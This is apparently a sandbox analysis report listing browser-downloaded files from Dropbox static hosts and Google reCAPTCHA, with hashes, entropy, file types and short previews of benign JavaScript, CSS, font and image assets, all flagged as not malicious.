                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="27402f9c-5afe-3c17-baed-bd2139fe47e6")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var n=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,n.get?n:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var n=l(t);e.CheckmarkCircleFill=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M12 4c-5.159 0-8 2.841-8 8s2.841 8 8 8 8-2.841 8-8-2.841-8-8-8Zm-1 11.56-3.03-3.03 1.06-1.06L11 13.44l3.97-3.97 1.06 1.06L11 15.56Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"})),e.FillScreenLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (684)
                                                                        Category:downloaded
                                                                        Size (bytes):685
                                                                        Entropy (8bit):5.033559356693095
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E2826FD92D6DCAF79021355095EC49D9
                                                                        SHA1:1572DA7F97839408214F18AF79C69611040E2084
                                                                        SHA-256:2C456C7236EE6F3541118C38AE364CF303F38926BA99C7FD65794802B172ACBD
                                                                        SHA-512:AAE0EE51EF9775A745E1B4A4607829609A54C211ED1C96303875FE6465770CBB54E267833E48C43BB7723891FF3D774F33200D6D8F5368817B085F946315EF85
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/notify-vfl4oJv2S.css
                                                                        Preview:#notify-wrapper{width:100%;height:0px;left:0;top:0;text-align:center;position:fixed;z-index:10001}#notify-wrapper .left-align{text-align:left}#notify,.notify{margin:8px;padding:8px 16px;font-size:12px;display:inline-block}.notify-msg .button-as-link{font-size:12px}.notify-portal-component{width:100%;height:0}.server-error{background-color:#f4e5ea;border:1px solid #9a0032;color:#9a0032}.server-warning{background-color:#fef5da;border:1px solid #9a6500;color:#9a6500}.server-success{background-color:#e5efe0;border:1px solid #2d8000;color:#2d8000}.server-info{background-color:#fff;border:1px solid rgba(0,0,0,0.05);color:#666}.maestro #notify-wrapper.with-top-notification{top:48px}.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (17932)
                                                                        Category:dropped
                                                                        Size (bytes):18276
                                                                        Entropy (8bit):4.9263793698169795
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A2F2FA8C8C7F6DBC133C619AE4CC43C4
                                                                        SHA1:22B4E78F14AE02F6C074C3EF018CBC020AD78DEB
                                                                        SHA-256:0E63C6091C29D3DCA1922361D83122AD342034AB06B6300C95EC509F0E7BDF48
                                                                        SHA-512:544E870A07262064C86C929EBB8DEDB2AD643D4FF044F54B7A891102EB1BB0BB3F5787C3EEC5A575498B40671E2E9AAD6D4BCA953D206B3B78E4E98AA57FAFFA
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/. */.__d("javascript-blowfish-1.0.5",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a=function(b,c){this.key=b,(c==="ecb"||c==="cbc")&&(this.mode=c),this.sBox0=a.sBox0.slice(),this.sBox1=a.sBox1.slice(),this.sBox2=a.sBox2.slice(),this.sBox3=a.sBox3.slice(),this.pArray=a.pArray.slice(),this.generateSubkeys(b)};a.prototype={sBox0:null,sBox1:null,sBox2:null,sBox3:null,pArray:null,key:null,mode:"ecb",iv:"abc12345",keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encrypt:function(a,b){if(this.mode==="ecb")return this.encryptECB(a);if(this.mode==="cbc")return this.encryptCBC(a,b);throw new Error("\u041d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u0440\u0435\u0436\u0438\u043c \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f.")},decrypt:function(a,b){if(this.mode==="ecb")return this.decryptECB(a);if(this.mode==="cbc")retur
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (57707)
                                                                        Category:downloaded
                                                                        Size (bytes):58085
                                                                        Entropy (8bit):5.108643131042136
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C6958FD8466841A533C108476042FD38
                                                                        SHA1:5770890DEE592DF9947CA6B1F0CD60FAD6A18635
                                                                        SHA-256:96E1FC48BD5017A54F4CB0B7B5F98B1FDE7FBB7FAECB5D1D7C70B88750B432C0
                                                                        SHA-512:D280E6B7E08A59348FFEC0EB21CC1742A203E16C6836E5214951D1990712AC324A75B59D8ADDC2D862A3BB4934289DC099790F9C56901214AEBD26F8223EFC84
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/e_data_modules_stormcrow-vflxpWP2E.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c0c8befa-3262-3a69-808b-a1884e579d1a")}catch(e){}}();.define(["exports","./c_api_v2_routes_user_metadata_provider","./c_init_data_edison","react","./e_core_exception","./c_lodash","./c_hive_schemas_sharing-request_access_user_events"],(function(t,e,r,n,s,i,o){"use strict";function a(t){if(t&&t.__esModule)return t;var e=Object.create(null);return t&&Object.keys(t).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(t,r);Object.defineProperty(e,r,n.get?n:{enumerable:!0,get:function(){return t[r]}})}})),e.default=t,Object.freeze(e)}var u=a(n);class c{constructor(){this.listeners=new Set,this.subscribe=this.subscribe.bind(this)}subscribe(t){const e={listener:t};return this.listeners.add(e),this.onSubscribe(),()=>{this.listeners.delete(e),this.onUnsubscribe()
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 250 x 541, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):144177
                                                                        Entropy (8bit):7.99677552018562
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:556D6510A5A3A5F14DCAAD9BAAF32E13
                                                                        SHA1:196322012C89E5753148F29CA57F5B8AE540E61C
                                                                        SHA-256:848159D4A1AE1606B5A1DF2E01254DE80019A6342A31684C10597FEF854C843A
                                                                        SHA-512:B49CDFE0FBD80E810D6CC0FA9DC1A00F327E23D69A935F4E2385F584D9CAB1D09382B50DB8AE28497C3D7B9DD32B95772033CFE98A05937D9FE8E5994481FBF1
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR..............2`...2.IDATx^.M.@.F.C.p..&.l`..\.......'.$.@.........m*....Sti.........Q*....#..BO.v..s..6...Rj.o.x.&.%..7m.~..\....CND'T..n...>".O9+.CC...{V..xN.V......D.8.4...t......8..a7W..A.^...;|6.7h.Y...8......sO+69.5tF..<R-.[..}.\.m.'...5..$r...}p(:c...B7.s>h.............~.^.........&.E...s.....o..[.M.v.V..w.3.Oh~...0..)N.......z..*.q..x..,.....i..s`.."..g...9|AN..=....B..q....d....!..9.;..MrH...RVNmoNQ.".X.|.......E..CQ/J..Q.aw....4.....z.>...i....._.......$......................k_boo............?%....].[O...,p...$$$ ##.... ...1>>....K.......333 .........:,//.n....Rm..=@q......*hrxx...\8::"......(//Gjj*}.1.R......NNNHw....5,,,0??...'...s./{v.M.=044...`.....U............"""@...#44.....8==....bcc...M=w9.2z.H....m.....EBf.=....QQQXZZBff&bbb....b...F{{;g...9...........Gz.{.!11.uuww.........^F'....g.h}.$......0...,v..WVV.X\\.L_VV.M..........n.I".].......%......e!k........1v....puu.........P*.....k5..WWW,r........O...m..g.......O......
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1014)
                                                                        Category:dropped
                                                                        Size (bytes):1379
                                                                        Entropy (8bit):5.255425701180506
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:58B2906FD59680CACF71ACB10EC64166
                                                                        SHA1:BF313A4578784AB7BA6D462AFB45E4F73FF0F33E
                                                                        SHA-256:289EF983491742A3A01094EE7DE0BDE3B553D9EF03417F66C0723E32FA4A256E
                                                                        SHA-512:0D323458FED8BE3867D4BA9E67B8F557C18706C1B2FFBDF34C7EB33169A7477B4D4C7327F596640C34861223256593C15ADA4AF16806A13B178E5510CF729B6F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ee194efa-4b01-3987-910b-fef898f8426b")}catch(e){}}();.define(["exports","./e_file_viewer_static_scl_page_file","react","./e_edison","./c_core_notify"],(function(s,t,e,r,i){"use strict";function a(s){return s&&s.__esModule?s:{default:s}}var p=a(e);class o extends p.default.Component{componentDidMount(){i.require_css({web:"/static/metaserver/static/css/sprites/web_sprites-vflwRzO2P.css",teams:"/static/metaserver/static/css/sprites/teams_sprites-vflnszfW9.css",business:"/static/metaserver/static/css/sprites/business_sprites-vflVZxy2R.css"}[this.props.group])}render(){const s=this.props.alt||"";return p.default.createElement("img",{className:t.cx("sprite",`sprite_${this.props.group}`,`s_${this.props.group}_${this.props.name}`,this.props.className),src:r.static_url("/static/metaserve
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (605)
                                                                        Category:dropped
                                                                        Size (bytes):120899
                                                                        Entropy (8bit):5.372355422595487
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:13435354F44CF4A97C5B8DD921FDC09D
                                                                        SHA1:81AFD1EE92FDB6E934D6488AE9D5A5B25A1B682C
                                                                        SHA-256:1CCBD1087A405430B4C1910E45BEB543E1483AE9FA08BEAA2B66371C43FCE86F
                                                                        SHA-512:ADFA35A4B5E5A4E7FEEB91F40F12E93BFDC043BBDD4F59CBD31A1F67AB58919F2076AE101B403A1BB2C9D8A315C57FE5C88340F959EDBAE5E7CF1A26616A800C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c49ea3a3-b008-34fa-b53b-d30675c3cbcd")}catch(e){}}();./** @license React v17.0.2. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){/*. Modernizr 3.0.0pre (Custom Build) | MIT.*/.'use strict';(function(M,ha){"object"===typeof exports&&"undefined"!==typeof module?ha(exports,require("react")):"function"===typeof define&&define.amd?define(["exports","react"],ha):(M=M||self,ha(M.ReactDOM={},M.React))})(this,function(M,ha){function m(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,c=1;c<arguments.length;c++)b+="&args[]="+encodeURIComponent(arguments[c]);return"Minified React error #"
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 82835
                                                                        Category:downloaded
                                                                        Size (bytes):26779
                                                                        Entropy (8bit):7.9894199988181525
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3E9BCA4720D3E68D5E20D5D24F814B32
                                                                        SHA1:7465C7E4A94BECCAE9E6BD035D54F2461F1FD39F
                                                                        SHA-256:D98F209DF2AFE1E476FB2F2B47DB4D35CF02FE9ACE4548734097C7182AE43E8B
                                                                        SHA-512:1A49A561645951C3B7DCC2B1EAC26CF5CC1FC4849C4E8B22FAC0B6A41CC8A6218889D6E783E028654A48AE27910CECAC9EC7995E200B2442BBF968D33A3E715D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/webpack/production/paper_admin~paper_admin_off_view_only~paper_binder~paper_bundle~paper_cloud_docs~paper_dashboard~pap~9fe60f07_48e78bb7959104361a91.Uar9gegWpq6jVz4_F6awa92vYNzS7ZBTaP7bdGH5VE0.js.gz
                                                                        Preview:............z.8.(....f....I.e)l.b..o;..R...."!................'._. ....t.....?...P(...F..ys:......_....lz.........J..........#7....W..........?N)..d., >...k.X..B...>.....rF.....x....:...s......k.......;...$..,.q....`5..^C{..C-.VQ..0..n..1...a.i...%%8.\.k...%..#~L...[.l.cm...|..x8.0...Y.z.g8.....H.O#....c@|....&o..].}.......L..xK..i......k....%$....h..M.A......h.]a-...j+....sa....#.?k..[jt..@.8 ....-.......^.`..V....}.g7.>.a.]......[.. lzte.....$.}m.X.?8.b...{t..$i.xq..ga..t.........i.4.......70H..".M...Q.r.+p...'{.......=. @.s`.8......>3e. ..gP.u.d.A...G..).........[...m/i...>....|>.?.....;|..||..L>..@......_....3....M.r..\.D....gh.*.,Gcx.Q.X;..8..q..h....o[..sp...c@....3p.A...K.`.....[..}...8._./.D;zy.5...^~.`.k..e..._~....e.:...D.'_...1f.h..p..fn.C...k.a......@...1...i..,..G...%w....&...%..6.2H.......<..3.....Y3........n...'X;..tg....3...7......y....0...(..._.........A!.!...."J.<...I@I.......V....m.E....Ar.>.`=.. ." (..........]43
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format, TrueType, length 58239, version 0.0
                                                                        Category:downloaded
                                                                        Size (bytes):58239
                                                                        Entropy (8bit):7.987567220825239
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:83BB5AE3E28AFB23B4ED2EF74C272312
                                                                        SHA1:C79EC10C6AB82271C588B59A0DD26DC57DE54843
                                                                        SHA-256:B1F18FD551241D3EFD5B9D114317F1D52C0C19677D3ECE876CE75249A1E067A6
                                                                        SHA-512:A804C81646BC9E204164342CC27A9A426BB3F65FB270DCCD08C5D79C74A84224D3BF0F4E1F3ADE1CFC60462425EB8735B489D3D4550A0921DDB44F590A2FEFE1
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/fonts/atlasgrotesk/AtlasGrotesk-Regular-Web-vflg7ta4-.woff
                                                                        Preview:wOFF...............D........................GPOS...h..0......;.GSUB...p........u._.LTSH...T...).....^'"OS/2.......M...`^.kfcmap..3....Z...\...cvt ..7............Yfpgm..5........a.B..gasp...\............glyf..;...b.... ]...hdmx......- ..`....head.......6...6....hhea.......!...$.+..hmtx...`........R.ovloca..7...........pmaxp....... ... ....name...\...,...gg...post...........|M..rprep..6........5B.e........B...0_.<...........a.......]c.;.,................x.c`d``...........5.A...2`...s.............d...i....................x.c`f.a....................2.1<d@....g.__.....L.:.]....3\Q``...c.g.....x.F......x.U[hTW.]{.I.XP.dFS'...d..q...2.i.i..D....RRb.T..(..~|....C"...J...?..U...P..~.:]{..v2...:..s.>g...c.OfOB.#.....FA.....Cz..X"7..1l.}."......<^./.#_".Cx....LG...-X.......c..x.x..GK...z.mz.....cX/.C|....!.c.Np~3.%8.t.......M.WOb.>..A[.e.......m......^...g.....}.eM K.j.k.0W.q..e.c@..4.q...W\.y...e.F.....e...n@.!..F...}.].^e.&i....s.s..x.......q?.m.n@.....@.....J.P3A
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 98445
                                                                        Category:downloaded
                                                                        Size (bytes):25116
                                                                        Entropy (8bit):7.9883643178041615
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:243926944379496989382FEC25568D6D
                                                                        SHA1:2EC5516E722AC29C2508BCAE9EF10E39D0B1A6DB
                                                                        SHA-256:01523ED9253EB671022938273903E300A7A5EC0A0EC40A75CDEF5DBF5285B679
                                                                        SHA-512:97BB902F2697DB47FFCA06850FE1D43F0FCEA08EBC1372E6DB9DFA3065E1F74BE9B86472C3C53EDF6C63640EFBF59047DCF01E5575B186D308C34E64DD23C1C5
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/webpack/production/paper_binder~paper_bundle~paper_cloud_docs~paper_native_desktop~paper_pifs~paper_view_only~section_mover_df85255a84167ce46d23.wFQuSrY3PuwmmPPGwZndl5Tsq0PgpVs21JWpJs9fdkY.js.gz
                                                                        Preview:............v.8.(._O!...#W.F...*.>.C...T...t`..Y.I..9Q.<._.u.....1. .jp...>?........'.).'.x|r.w.....8<...x...x...x..,{:Ko....)I..A.....Y.D|xa<..~."!.4.'c.._h<...`"....u.G.....A....{..#.x..y.sL.....h._.N<j.d.D."..$.s."c<&.i..Bb..=.g...fV..o.....^.!.Q...q....,bC0..H..%Q..Qj...+..n.e.e>.M.....!..JMo.......|.z......$8.n/g77$..J.j--.8....y...........'At..]9G.Z.<6^.....m.|.~..IH4.*e4..++.F..jw..S.D.%...'m... m..1B.t..o.W...'..u.}.......M...]..Cw...;..n.B.../^...;.va...fw$..!...n.-&.C!.0.,6..M.._....G.?Sw..Y..P.....<.D.J %.IQ.....-...Q &.n<0.'F..>.%.j..hV...].k..#{<._q@Ibb...?.2C..AX.vC".`.'&,.R:....z.fd.......)iw..}.R........<?.S..L.fb=....!.u:.M.M...?F.k..S2..".1M. %#g...G}.Q.a.v...p.EvJ"jZ....u.h......_M...B.m..x:..|.....U..e..YV+C.n.D.0t]...U.+..I...Z.."s.J\j..<..@.......l.$q..............8...c...q;..8..8.I.=..a{..-j......wq...G...q..62....M.W1..g. @c:..............8.%......*Bi.Ay9&R. .b......'...IY..M.m..C..89Yf;H.Z.....9.45y.R.@...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (40406)
                                                                        Category:downloaded
                                                                        Size (bytes):40480
                                                                        Entropy (8bit):5.357206875268569
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:56F24BF65A9DBF2F742B23862202581E
                                                                        SHA1:4A3F4D54CF39D4AC5FE022EBBDF205B462A2D30C
                                                                        SHA-256:CFAC3A2722FCB92E5844C231276C621A1F67285EB7172AB9206C56BA34BA91B8
                                                                        SHA-512:2673463BC63D4C2336D61859B797B2CB6CC35F1ACB2C964DDEADC7097AC5ED739B18C4835BA14A539FA8E515614E96D79450A4B923F6B405984063767776FE7E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/js/file_viewer/index.web-vflVvJL9l.css
                                                                        Preview:./* -- bazel-out/k8-opt/bin/node_modules/videojs/dist/video-js.css */.@charset "UTF-8";.video-js .vjs-big-play-button .vjs-icon-placeholder:before,.video-js .vjs-modal-dialog,.vjs-button>.vjs-icon-placeholder:before,.vjs-modal-dialog .vjs-modal-dialog-content{height:100%;left:0;position:absolute;top:0;width:100%}.video-js .vjs-big-play-button .vjs-icon-placeholder:before,.vjs-button>.vjs-icon-placeholder:before{text-align:center}@font-face{font-family:VideoJS;font-style:normal;font-weight:400;src:url(data:application/font-woff;charset=utf-8;base64,d09GRgABAAAAABDkAAsAAAAAG6gAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAABHU1VCAAABCAAAADsAAABUIIslek9TLzIAAAFEAAAAPgAAAFZRiV3hY21hcAAAAYQAAADaAAADPv749/pnbHlmAAACYAAAC3AAABHQZg6OcWhlYWQAAA3QAAAAKwAAADYZw251aGhlYQAADfwAAAAdAAAAJA+RCLFobXR4AAAOHAAAABMAAACM744AAGxvY2EAAA4wAAAASAAAAEhF6kqubWF4cAAADngAAAAfAAAAIAE0AIFuYW1lAAAOmAAAASUAAAIK1cf1oHBvc3QAAA/AAAABJAAAAdPExYuNeJxjYGRgYOBiMGCwY2BycfMJYeDLSSzJY5BiYGGAAJA8MpsxJzM9kYEDxgPKsYBpDiBmg4gCACY7BUgAeJxjYGS7wTiBgZ
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2250)
                                                                        Category:downloaded
                                                                        Size (bytes):2647
                                                                        Entropy (8bit):5.427217536364506
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:BE61963DDB3139F73E380C758D09FF0E
                                                                        SHA1:2C7E30998A15479A7DEA39F15A99E1E72B73C64D
                                                                        SHA-256:975B0E5F1FEC2FAF0AD0D8212B314A7ACA2961758467727AA1511F7AECB1580B
                                                                        SHA-512:FF4E52E48AFEBD1AD65DF6B6E151C345649EADFFFA66C43564054CA73D7BD79A5B45B67DC891D35F7BCF705C4AACCA0E1A20085EECA5C03244B4E67C39805D2B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_upload-file-vflvmGWPd.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="245ea3b6-c147-3b1d-9050-32f618d0853f")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.CircleStandardFilledFill=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M12 4c-5.159 0-8 2.841-8 8s2.841 8 8 8 8-2.841 8-8-2.841-8-8-8Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"})),e.CircleStandardLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M12 4c-5.159 0-8 2.841-8 8s2.8
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1548)
                                                                        Category:dropped
                                                                        Size (bytes):1940
                                                                        Entropy (8bit):5.469918823199383
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:03E36DC603D07A7B3D53CDE19F3CB51A
                                                                        SHA1:014746A17025049C12512A6D3524E6AE1E9BE585
                                                                        SHA-256:509426EBD0A3FA3781DD902B863792DD276F4B5216C17068FD1A4892D8F43609
                                                                        SHA-512:44168F862F24BD5B7611A762E18AE09263C0A849B59070554A33DEFFC823D42E037490C03170DC42D75C8AC9E6FAEFA41FEC2F34FC1E90AAC177943840ED2E2D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="7dcf6db7-46b4-384f-90e1-fab85cf31715")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.BugLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M16.5 13.5h2V12h-2V9H15v-.25a3.324 3.324 0 0 0-.769-2.284l.69-1.38-1.342-.671-.629 1.256a4.316 4.316 0 0 0-2.4 0l-.629-1.256-1.342.67.69 1.38A3.325 3.325 0 0 0 8.5 8.75V9H7v3H5v1.5h2v1.25c0 .1.007.191.011.287l-1.943.486.364 1.455 1.822-.456C7.84 18.413 9.428 19.5 11.75 19.5c2.303
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 85632, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):85632
                                                                        Entropy (8bit):7.9972316340835095
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:D0768F14362AC267F79F96EBB4D3E6C1
                                                                        SHA1:44F75583C947B15A4B4C7B9388841EBC4F2D4A61
                                                                        SHA-256:49C13FE5BCF96044A62CDA22CF8439AB12F3645DE3A2CE1C0623A2D0A75864E6
                                                                        SHA-512:D12884670C414FE143D7F5F192529A718CA81588CFD6B6ED69AA10C7344C8C1D793949B27D5F02AE7BDE930C6DA217D3C1DB7D2282CE4AB7891D5998C1F33294
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/fonts/AtlasGrotesk-SemiItalic-190618-Web.woff2
                                                                        Preview:wOF2......N...........N...............................j.`..v.H..s........h..,..6.$..T. .....B..f[....Je.....:.D&.U;G..%....v..v...0...b.-...r...M.x..m..=@g.;...........&..O.w.v...@....?$M4.i__K.T.".H.I.rfddf.5..Xk..y..x....*...t.,..X.x......d.;L.%`...E..2..*......(.E.L.k..U..[j.............SK"/t^..e...;.f....CE7.B"..k.4.q.<..^..Gw.^E.7..Nn.E).@*a..A.......{d.B:..&.&.C..).."7.$,.i.m."P.>....|...-.;(...DsV.A...c....WH..h:<r...;.2Un....L.."UZ.u3....*.&...)E.....Wt.Z..z7p......2..=.......F.5../.{F".\H./.E...pg...(..Zp..?..6Pp..m....}.P.;...[.v%......Y3.t.....)na.^.=;,..W.....n-...x.j.F.\......YP*O.`NR.{.....}-#..;..U.V.>...q^..e....&...B^X.>l...S...^m.>A.L.K.'..8...k.../....7...P5....'....l..Wa.....^...iY....._....].F.....D86....*..aZ.#...;....0.F......{...6.....N'.-.".d..c... ....8...(.C.....J...U....3.B...K.H`.....O.AG.w$.........(....;.;.....8.$...U.gl.tQ:.....9..l..m.g>..F{.l]..O..E.#....x..Qq......yb[..(D....i#.6.;.........|..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:data
                                                                        Category:downloaded
                                                                        Size (bytes):550905
                                                                        Entropy (8bit):5.666803401551392
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C7BE68088B0A823F1A4C1F77C702D1B4
                                                                        SHA1:05D42D754AFD21681C0E815799B88FBE1FBABF4E
                                                                        SHA-256:4943E91F7F53318D481CA07297395ABBC52541C2BE55D7276ECDA152CD7AD9C3
                                                                        SHA-512:CB76505845E7FC0988ADE0598E6EA80636713E20209E1260EE4413423B45235F57CB0A33FCA7BAF223E829835CB76A52244C3197E4C0C166DAD9B946B9285222
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://www.gstatic.com/recaptcha/releases/EGbODne6buzpTnWrrBprcfAY/recaptcha__en.js
                                                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var S=function(){return[function(q,y,d,h,l,A,G,V){if((q-((q>>((G=[26,"A","JT"],q|72)==q&&(d=[sC,VO],V=(h=Array.from(ee(vv)).find(function(v){return d.includes(v.autocomplete)&&v.type!=Wv&&v.value}))==y?void 0:h.value),1)&11)>=3&&(q-7&16)<9&&(A=h.u[h.u.length-y],l=OC(),A.Pj<=l&&(A.CB=d),h[G[1]]&&h[G[1 =A.CB||(A.CB===1?(h[G[1]]=y,h.Yu(A.Pj-l)):(h[G[1]]=d,h[G[2]]()))),5)|35)<q&&q-8<<1>=q)S[13](3,"label",this);return(q|7)>=-43&&(q|3)>>4<1&&(V=H[28](G[0],y,d,h)),V},function(q,y,d,h,l,A,G,V,v,e,a){return(((q|.1)&(a=[8,7,"O"],a[1]))>=0&&q>>1<12&&(h.P[a[2]]=y,v=[!0,100,1E3],U[36](2,v[1],"2fa","audio",36,h.u,d),h.u.P.I=h
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3557)
                                                                        Category:downloaded
                                                                        Size (bytes):3959
                                                                        Entropy (8bit):5.004501102963887
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9CE5242E416C3D2F50FC186B8DBBF19C
                                                                        SHA1:50BB392C52D3899F861E58B07871AB8E8ED66176
                                                                        SHA-256:C979459730D6B2F63BCF6512FCFB098D6E4948ACF0DDAAFBCEE39B93623239C1
                                                                        SHA-512:9CCC51D1004530E84074D8CD5B63FA16AECBA62FD4D6955C50FA50F4B55A662DBFCD349867836179C49AF1199366991485850F161A95419D32B9DCE191C2A12E
                                                                        Malicious:false
                                                                        Reputation:unknown
